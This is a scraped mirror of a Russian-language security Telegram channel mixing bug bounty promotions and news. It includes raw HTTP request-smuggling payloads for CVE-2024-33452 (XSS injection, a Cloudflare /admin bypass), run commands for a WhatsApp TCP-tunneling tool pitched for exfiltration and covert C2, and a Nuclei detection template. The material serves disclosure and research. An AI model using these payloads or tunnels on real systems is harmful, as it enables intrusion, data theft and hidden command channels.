Warning: Undefined array key 0 in /var/www/tgoop/function.php on line 65

Warning: Trying to access array offset on value of type null in /var/www/tgoop/function.php on line 65
- Telegram Web
Telegram Web
Media is too big
VIEW IN TELEGRAM
Привет, похекеры! Сегодня у нас есть крутая новость для всех, кто увлекается багхантингом и хочет получить приятные бонусы.

Но это не всё! Я также хочу пригласить вас на сайт https://eh.su/rating, где вы можете проголосовать за свои любимые багбаунти программы. Каждый день вы можете отдать до 10 голосов и даже оставить комментарий, если хотите.

А теперь самое интересное: в рейтинге есть топ голосующих, и по итогам месяца 5 пользователей получат призы! ТОП-1 получит 15 000 рублей, ТОП-2 — 10 000 рублей, а ТОП-3 — 5 000 рублей прямо на карту. И ещё два человека будут выбраны случайным образом из всех остальных проголосовавших и тоже получат призы — крутые футболки от Багхантера!

Итак, обязательно проголосуйте за свои любимые программы. Удачи! 👍
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Anatoly
Forwarded from SHADOW:Group
🔃 OpenResty/lua-nginx-module: Уязвимость HTTP Request Smuggling в HEAD-запросах

Раскрыли подробности CVE-2024-33452. При обработке HTTP/1.1-запросов lua-nginx-module некорректно разбирает HEAD-запросы с телом, воспринимая тело запроса как новый отдельный запрос.

Пример

Обычно прокси-серверы интерпретируют следующий HTTP-запрос как единый, поскольку GET /smuggle находится в теле HEAD-запроса:

HEAD / HTTP/1.1
Host: localhost
Content-Length: 52

GET /smuggle HTTP/1.1
Host: localhost


Однако lua-nginx-module интерпретирует его как два отдельных запроса, что приводит к рассинхронизации прокси-серверов в цепочке.

Сценарии атак

Прокси-серверы, использующие lua-nginx-module, уязвимы к этой атаке (например, Kong Gateway, Apache APISIX и другие).

Пример с Kong Gateway

Если Kong работает самостоятельно, уязвимость не представляет особой опасности. Но если Kong используется в связке с фронт-прокси (например, Nginx, Cloudflare и т. д.), злоумышленник может:
1. Внедрять вредоносные ответы (например, XSS-атаки).
2. Обходить защиту фронт-прокси (например, обход Cloudflare).
3. Перехватывать ответы других пользователей.

1️⃣ Внедрение XSS через смуглинг

Этот сценарий позволяет заставить всех пользователей загрузить вредоносный ответ с XSS-кодом, даже если сайт использует обычную страницу Apache.

HEAD / HTTP/1.1
Host: localhost
Content-Length: 122

HEAD /app HTTP/1.1
Host: localhost
Connection: keep-alive

GET /app/assets?<script>alert(origin)</script> HTTP/1.1
X:


Результат: Все пользователи, отправляющие обычные запросы, получат XSS-скрипт в ответе.

2️⃣ Обход защиты фронт-прокси (Cloudflare)

Допустим, Cloudflare блокирует доступ к /admin. Злоумышленник может скрыть GET-запрос к /admin внутри HEAD-запроса и обойти защиту.

Пример:

HEAD / HTTP/1.1
Host: victim.com
Content-Length: 40

GET /admin HTTP/1.1
Host: victim.com


Результат: Cloudflare не увидит GET-запрос, и злоумышленник сможет обойти защиту.

3️⃣ Кража ответов других пользователей

Этот метод позволяет рассинхронизировать очередь ответов на сервере и захватить ответы других пользователей.

Пример атаки
1. Атакующий отправляет HEAD-запрос с внедрённым GET-запросом.
2. Сервер ошибочно интерпретирует тело как отдельный запрос.
3. Ответ попадает не атакующему, а следующему пользователю, а атакующий может забрать ответ жертвы.

Подробности

Более подробное описание читайте в блоге по ссылке.

#web #hrs #xss
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Выкатил бложик в виде сайта. Пока статей особо нет, но если какие-то баги найдёте - можете писать в чат
https://blog.poxek.cc/

Нашли баги, сайт уходит на доработку)
Похек
Выкатил бложик в виде сайта. Пока статей особо нет, но если какие-то баги найдёте - можете писать в чат https://blog.poxek.cc/ Нашли баги, сайт уходит на доработку)
За 2-3 часа переписал полностью с Astro на NextJS. Можете снова искать баги :)

Эх вы, дудосеры. Положили все таки 😁
Forwarded from s0ld13r ch. (s0ld13r)
Tunneling over WhatsApp for Red Team scenarios 👋

Пока сидел попивая вкусный наурыз көже, как обычно листал ленту и наткнулся на интересный Github проект 🪨

wa-tunnel - это инструмент для туннелирования TCP-трафика через WhatsApp с использованием Baileys, позволяющий обходить сетевые ограничения и использовать WhatsApp как прокси 😠

Server side:

npm run server <VPS> <PORT> <PHONE>

Client side:


npm run client <PORT> <PHONE>

В данном случае поднимается клиент и сервер которые коммуницируют посредством WhatsApp чата, основная привязка тут стоит не к IP-адресам напрямую, а к номерам телефонов что довольно прикольно 😆

Векторы абуза для Red Team:

1️⃣Простор для эксфильтрации данных
2️⃣Можно попробовать использовать его как резервный Reverse Proxy
3️⃣Дополнительный слой OPSEC для сокрытия канала C2

P.S инструмент и техника не новая, но все новое хорошо забытое старое

@s0ld13r_ch
Please open Telegram to view this post
VIEW IN TELEGRAM
AI-powered SOC: революция в работе центров обеспечения безопасности
#SOC #AI #cybersecurity@poxek #ML #security

Современные SOC сталкиваются с лавинообразным ростом числа инцидентов и ложных срабатываний, что создает серьезную нагрузку на аналитиков. Искусственный интеллект становится не просто модным трендом, а необходимым инструментом для эффективной работы центров безопасности. По данным исследований,

AI-powered SOC способен обрабатывать инциденты в 10 раз быстрее традиционного подхода.

Ключевые направления применения AI в SOC:
➡️Автоматическая классификация инцидентов: ML-модели определяют приоритет и тип угроз
➡️Поведенческая аналитика: выявление аномального поведения пользователей и систем
➡️Предиктивный анализ: прогнозирование потенциальных атак на основе исторических данных
➡️Автоматизация рутинных задач: высвобождение времени аналитиков для сложных расследований

💵Практический кейс
Крупный банк внедрил AI-систему в SOC и получил следующие результаты:
▪️Снижение false-positive на 76%
▪️Ускорение обработки инцидентов в 8.5 раз
▪️Автоматическое закрытие 65% типовых инцидентов

❗️Важные моменты при внедрении
➡️Качественные данные для обучения моделей
➡️Постоянная валидация результатов работы AI
➡️Гибридный подход: AI + экспертиза аналитиков
➡️Интеграция с существующими процессами ИБ

🔗 Дополнительное чтиво

Ваши ставки, сколько уйдет денег и времени на обучение такого ML/ИИ?

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from НеКасперский
Media is too big
VIEW IN TELEGRAM
Дорога ложка к обеду

Объекты критической инфраструктуры по всему миру страдают от SSRF-уязвимости в популярнейшей обёртке над ChatGPT.

Специалисты из Veriti в течение трёх месяцев фиксируют нападения на корпоративные сети организаций. По их словам, число атак превысило 10 тысяч в неделю.

Брешь позволяет вводить вредоносные URL-адреса во входные параметры, заставляя приложение делать несанкционированные запросы. В ходе атаки хакеры могут получить доступ к конфиденциальным данным и внутренним ресурсам организаций.

Код PoC-эксплойта хранится в открытом доступе, а уязвимость не требует аутентификации. Она представляет угрозу для 35% проверенных компаний из-за недочётов в конфигурации межсетевых экранов, а также неверно настроенных IPS и WAF.

Большая часть таких атак направлена на госсектор США. Помимо этого, нападения зафиксированы в Индонезии, Колумбии, Германии, Таиланде и Великобритании.

Как ни странно, о проблеме известно ещё с сентября 2023 года, но всем было всё равно.

НеКасперский
Как мы взломали цепочку поставок и получили 50 тысяч долларов
#docker #DevOps #bugbounty #багбаунти #github

Прикольная статья про то, как два француза соревновались друг с другом за крутое Баунти и место в лидерборде HackerOne и как в итоге пришли к сотрудничеству)

Ребята захотели сделать что-то нереальное и реализовать один из сложных векторов для RCE через Supply Chain Attack. Они узнали, что компания недавно купила другую дочернюю компанию и они предположили, что там могут быть хреновые процессы и за ними меньше следят, собственно они не прогадали)

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Please open Telegram to view this post
VIEW IN TELEGRAM
У меня есть хорошие друзья - Defbox. С Мишей, одним из основателей снимали подкаст yt/rt ) Defbox ищет таланты которые готовы поучаствовать в создании лабораторных работ для платформы Defbox.io

Что такое лабораторная работа в Defbox(см.схему):
1. Лабораторная работа должна развивать навык, один или несколько, но может быть и просто по фану.
2. Лаба состоит из одной или нескольких преднастроенных виртуальных машин (пока только linux)
3. Внутри лабы - набор заданий (не менее 5) и проверок к заданиям. Проверки могут быть написаны в виде скриптов или быть флагами.
4. К каждому заданию предоставляется теоретический материал.
5. Каждое задание сопровождается одной или несколькими подсказками.

Мы ищем тех кто готов поделиться своими знаниями и опытом за вознаграждение в разных направлениях - Пентест, Безопасная разработка, Сетевая безопасность, Детектирование атак, и тд.

Если интересно - пишите @Demianov
Forwarded from Pentest HaT (Андрей (Exited3n))
⚙️ IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX

Wiz Research
обнаружила CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 и CVE-2025-1974, серию RCE в контроллере Ingress NGINX для Kubernetes, получившем название IngressNightmare. Использование этих уязвимостей приводит к несанкционированному доступу злоумышленников к чувствительным данным, хранящимся во всех namespace'ах кластера Kubernetes, что может привести к его захвату.

Nuclei шаблон для проверки:

id: exposed-ingress-nginx-admission

info:
name: Publicly exposed Ingress NGINX Admission
author: Wiz research
severity: high
description: Ingress Nginx admission controller endpoint should not be exposed
metadata:
max-request: 1
tags: ssl,tls

ssl:
- address: "{{Host}}:{{Port}}"

matchers:
- type: dsl
dsl:
- 'contains(issuer_org, "nil1")'
- 'contains(subject_org, "nil2")'
- 'contains(subject_an, "nginx")'
condition: and

extractors:
- type: json
name: issuer_org
json:
- ".issuer_org[0]"

- type: json
name: subject_org
json:
- ".subject_org[0]"

- type: json
name: subject_an
json:
- ".subject_an[0]"


Подробнее (на англ.)

➡️ Research

#nginx #ingress #cve

✈️ Pentest HaT
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Standoff 365
Хотите задать вопрос топовым хакерам из Synack и HackerOne?

В нашем канале коммуникации 15 апреля в 19:00 (мск) пройдет стрим в формате ответов на все ваши вопросы с топовыми хакерами Hussein Daher и Nikhil "Niksthehacker" Shrivastava!

Что будет на стриме?

🔥 Как гости стрима пришли в багбаунти и что стало точкой невозврата?
🔥 На каких уязвимостях они фокусируются и почему?
🔥 Как понять, когда копать глубже, а когда менять таргет?
🔥 Самые запоминающиеся репорты, инсайты и лайфхаки.

Кто в эфире?

🔹 Hussein Daher — этичный хакер, который с 2014 года нашел более 1500 уязвимостей более чем в 800 компаниях. Основатель WebImmunify․com, компании, которая занимается пентестом и консультациями по кибербезопасности.
🔹Nikhil Shrivastava (Niksthehacker) — Synack Legend Hacker — помог найти более 1500 уязвимостей в продуктах Google, Microsoft, Tesla. Выступал на DEF CON, BlackHat и RSA.

Модератором стрима выступит Александр Мошков.

💡 Готовьте вопросы — спикеры ответят на все, что вы захотите узнать!
Please open Telegram to view this post
VIEW IN TELEGRAM
Готовы к разрывной?
Новая вакансия Гусь-новосёл в Astra

Обязанности:
- Возглавить миграцию айтишников в новый офис.
- Вдохновлять коллег на поддержание порядка в переговорках и в мыслях.
- Тестировать массажные кресла для сотрудников.
- Проверять кофе-машины под высокой нагрузкой.
- Участвовать в разработке сбалансированных вкусных завтраков в офисе.
- Придумывать поводы для искреннего гогота с целью поддержания в норме психоэмоционального состояния коллег.
- Раскусывать баги.
- Покачивать перьями в такт музыке из колонок на кухне.
- Заботливо задавать команде вопрос «как дела?», чтобы напомнить об отпускной зимовке, которой давно не было.
- Превентивно настойчиво шипеть, когда кто-то хочет деплоить в пятницу.


Требования:
- Опыт работы на позиции гуся-новосёла от 5 лет, уровень Senior и выше.
- Развитые навыки коммуникации со стейкхолдерами, чипсохолдерами и другими холдерами съестного.
- Готовность трудиться, не покладая лап.
- Знание алгоритмов поедания яблок и зефира (не надо оптимизировать, надо наслаждаться).
- Любовь к пингвинам, слонам, туканам, медведям, дружелюбие к фауне и флоре.
- Держать клюв по ветру.

https://hh.ru/vacancy/118740353
🌚 Редтимим мониторинг: рекон Grafana
#grafana #recon #разведка

Команда CyberOK снова провела классный ресерч и поделился с сообществом на Хабре. Ребята взяли свой опыт, разнюхали новые баги и получилась классная статья)

В ходе их исследования они выяснили, что Grafana может быть использована для:
➡️Сбора чувствительных данных (API-ключи, пароли, конфигурации).
➡️Проведения SSRF-атак.
➡️Сканирования портов и фингерпринта сервисов. (Напоминает Zabbix))
➡️Брутфорса учетных записей и подбора паролей.
➡️Выполнение произвольных SQL-запросов через датасорсы или SQLi через дашборды.

А в конце статьи дали готовый чек-лист по аудиту Grafana. Считаю статья более чем достойна вашего прочтения)

➡️ Читать всё

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Please open Telegram to view this post
VIEW IN TELEGRAM
2025/03/27 10:35:40
Back to Top
HTML Embed Code: